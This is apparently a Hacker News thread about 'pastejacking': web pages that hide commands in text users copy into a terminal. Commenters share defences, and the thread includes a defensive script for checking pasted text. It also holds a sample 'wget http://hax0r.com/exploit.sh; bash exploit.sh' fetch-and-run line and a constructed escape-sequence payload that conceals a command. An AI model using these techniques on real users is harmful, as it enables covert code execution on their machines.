
Look before you paste from a website to terminal - marcinkuzminski
http://lifepluslinux.blogspot.com/2017/01/look-before-you-paste-from-website-to.html
======
teh_klev
This sort of _attack_ has been discussed in great detail previously:

[https://news.ycombinator.com/item?id=10554679](https://news.ycombinator.com/item?id=10554679)

[https://news.ycombinator.com/item?id=5508225](https://news.ycombinator.com/item?id=5508225)

[http://thejh.net/misc/website-terminal-copy-paste](http://thejh.net/misc/website-terminal-copy-paste)

------
M4v3R
Not sure if this is iTerm2 or zsh, but I have to confirm the code I am pasting
by pressing enter, which gives me an opportunity to review it first. I like
this feature a lot.

~~~
mdrzn
Not always, sometimes when I copy something and paste it with Ctrl+V (instead
of Ctrl+Shift+V) it still gets pasted and entered.

~~~
joenot443
This could be incorrect, but could it be because there's a newline character
copied as well which gets translated into an Enter?

~~~
mdrzn
It surely could be, but that bypasses M4v3R's opportunity to review the code.

This problem appears to me on iTerm2 build 2.1

------
annnnd
Even more interesting: given the plethora of options terminals have for
coloring, moving, erasing and similar, is it possible to hide malicious input
from the shell too so that the victim is unaware of it?

~~~
lima
Yep. There are a few demonstrations floating around.

------
martin-adams
Here's a question, could such an exploit be achieved using something like
Stack Overflow?

~~~
dspillett
Probably not due to the limited markup options available.

It would almost certainly be possible from a great many similar forums and
bulletin-board like sites though.

~~~
Klathmon
Could you get away with a more limited version by abusing Unicode?

With so many "unprintables" combined with things like the RTL and LTR control
characters I think it would be possible on some level.

------
stymaar
What I usually do since I've been shown this kind of attack:

- Ctrl-X Ctrl-E: open the default text editor on your system

- paste your snippet there and review it

- save the snippet in your editor; it is now run.

------
godelski
In zsh I can paste (or paste) into the browser (FF) I get

    ls ; clear; echo 'Haha! You gave me access to your computer with sudo!';
    echo -ne 'h4cking ## (10%)\r'; sleep 0.3;
    echo -ne 'h4cking ### (20%)\r'; sleep 0.3;
    echo -ne 'h4cking ##### (33%)\r'; sleep 0.3;
    echo -ne 'h4cking ####### (40%)\r'; sleep 0.3;
    echo -ne 'h4cking ########## (50%)\r'; sleep 0.3;
    echo -ne 'h4cking ############# (66%)\r'; sleep 0.3;
    echo -ne 'h4cking ##################### (99%)\r'; sleep 0.3;
    echo -ne 'h4cking ####################### (100%)\r'; echo -ne '\n';
    echo 'Hacking complete.';
    echo 'Use GUI interface using visual basic to track my IP'
    ls -lat

Which seems like it would be pretty stupid for me to press enter. Which, if
we're talking security, it seems the more sane thing to do is not to
automatically send commands that are pasted in. Zsh being secure and bash not.
I feel this is more a developer issue than a user one.

~~~
gumby
> Which seems like it would be pretty stupid for me to press enter. Which, if
> we're talking security, it seems the more sane thing to do is not to
> automatically send commands that are pasted in. Zsh being secure and bash
> not. I feel this is more a developer issue than a user one.

A triple click selection will copy the whole line _including the newline_. So
a paste will execute it as well.

------
esseti
This should be exploited by Stack Overflow to have a counter on which lines
were copied and how many times. With this counter one could know what's the
best answer used by many :)

------
Sean1708
Bracketed paste and a vaguely half-decent terminal emulator will prevent this.

------
sly010
I already paste everything longer than a single line to my non-terminal text
editor (e.g. sublime) before I paste it to my terminal or vim. Perhaps I
should start doing this for everything.

------
zupreme
This is a valid danger but the author goes a bit far with the sudo warning.
Unless you're logged in as root to most systems (in which case sudo likely
won't be needed to screw your system up) using sudo would result in a password
being requested which, I would hope, the user would see as a red flag,
especially if they are technical enough to be locating and testing script
snippets.

~~~
godelski
Except sudo has a 15 minute timeout. So there's a decent chance someone has
used sudo in that time.

~~~
geggam
when did ubuntu start shipping with password sudo ?

------
tyrylu
Probably worthless tip, try browsing that code snippet with a screen reader.
Yes, it is not hidden from that software. :-)

~~~
carlesfe
I feel that we are not exactly the target audience for this kind of tip. Linux
forums are full of code snippets that people blindly copy and paste, so this is
clearly an extended behavior.

In any case, most newbies wouldn't even understand whether a command is
malicious or not (e.g. `wget http://hax0r.com/exploit.sh; bash exploit.sh`),
but I wouldn't say the tip is worthless...

------
gigatexal
Has anyone been burned by this? I'm going to start pasting things into a
different text editor before running them.

~~~
stronglikedan
That's my go-to method. I use Notepad++ with "View -> Show Symbol -> Show All
Characters" turned on.
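The review step several commenters describe (stymaar's Ctrl-X Ctrl-E detour, gumby's point that a triple-click selection carries the newline that submits the command, Klathmon's Unicode question, and stronglikedan's "Show All Characters" habit) can be scripted. The following is an added example, not code from the thread or from the linked article: a pre-flight check for text you are about to paste into a shell. It reads the candidate text on stdin, counts the things a terminal would act on or hide (newlines, control bytes such as ESC and CR, non-ASCII bytes), prints the bytes as the shell would receive them, and exits non-zero when anything is found. The clipboard commands named in the usage note (`xclip`, `pbpaste`) and the sample payload are assumptions and constructed data, not taken from the page.

```shell
# Added example, not code from the thread or the linked article: a pre-flight
# check for text you are about to paste into a shell. Feed it the candidate
# text on stdin; it reports what a terminal would act on or hide, prints the
# bytes as the shell would see them, and exits non-zero if anything is found.
# Clipboard readers such as `xclip -o` or `pbpaste` are assumptions about the
# system; any command that produces the text on stdout works.

# Newline bytes: each one is an Enter, so the text before it runs on paste.
count_newlines() {
    tr -cd '\n' | wc -c | tr -d ' '
}

# ASCII control bytes other than newline and tab. ESC (octal 033) starts
# terminal escape sequences (erase line, move cursor); CR (015) rewinds the
# cursor so later text overwrites what was already shown.
count_controls() {
    LC_ALL=C tr -d '\n\t' | LC_ALL=C tr -cd '\001-\037\177' | wc -c | tr -d ' '
}

# Bytes with the high bit set. Every non-ASCII character (zero-width space,
# RTL/LTR marks, look-alike letters) is encoded in UTF-8 as such bytes, so a
# non-zero count means the text contains something that is not plain ASCII.
count_non_ascii() {
    LC_ALL=C tr -cd '\200-\377' | wc -c | tr -d ' '
}

# Read stdin once, run the three counters, show the text with control bytes
# rendered as ^X and high bytes as M-x (cat -v, GNU and BSD), and return 1
# when anything suspicious was found.
paste_check() {
    tmp=$(mktemp) || return 2
    cat > "$tmp"
    nl=$(count_newlines < "$tmp")
    ctl=$(count_controls < "$tmp")
    hi=$(count_non_ascii < "$tmp")
    printf 'newlines=%s control_bytes=%s non_ascii_bytes=%s\n' "$nl" "$ctl" "$hi"
    printf '%s\n' '--- bytes as the shell receives them (cat -v) ---'
    cat -v "$tmp"
    printf '\n%s\n' '--- end ---'
    rm -f "$tmp"
    if [ "$((nl + ctl + hi))" -eq 0 ]; then
        return 0
    fi
    return 1
}

# Constructed sample, not a real payload: what a page could hand to the
# clipboard. The visible command is "ls -la"; ESC[2K and CR erase it from the
# screen, a second command follows, and the trailing newline submits it all.
sample_paste() {
    printf 'ls -la\033[2K\r; echo "this ran without you pressing Enter"\n'
}
```

Typical use is `xclip -o -selection clipboard | paste_check` on X11 or `pbpaste | paste_check` on macOS (both assumed to be installed); `sample_paste | paste_check` shows what the report looks like on the constructed payload. The checks are deliberately byte-level and locale-independent so that nothing a terminal renders invisibly slips through. This is a stopgap for shells without bracketed paste: a terminal that supports it wraps the paste in `ESC[200~` and `ESC[201~`, and bash 4.4+ (readline's `enable-bracketed-paste`) and zsh 5.1+ then leave the pasted text on the line for editing instead of executing at every embedded newline, which is the fix Sean1708 refers to.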

------
marcinkuzminski
Found another one here: [http://thejh.net/misc/website-terminal-copy-paste](http://thejh.net/misc/website-terminal-copy-paste)

------
akerro
Pfff should have just put forkbomb there.

------
bjt2n3904
The "fix" to this problem is not to let your browser hook Ctrl+C. Mozilla, if
you're listening, could you perhaps make this an option? Or perhaps display a
notice if you notice JS hook on Ctrl+C?

~~~
chr1
The example in the article doesn't use javascript, and doesn't hook Ctrl-C,
all it uses is simple css.

The problem here is not related to the browsers at all, the problem is on the
terminal side, which should not immediately run any random text that was
pasted, but should allow editing the pasted text before running.

~~~
chaosfox
I am not sure the browser is free of blame here, getting invisible characters
copied together with the text I selected goes completely against my
expectations.

~~~
brod
This could be considered a handy feature in a different scenario; the browser
shouldn't be responsible for checking if the text you copied was visible.

Just get a half decent terminal, many have precautions in place for
copy/paste.

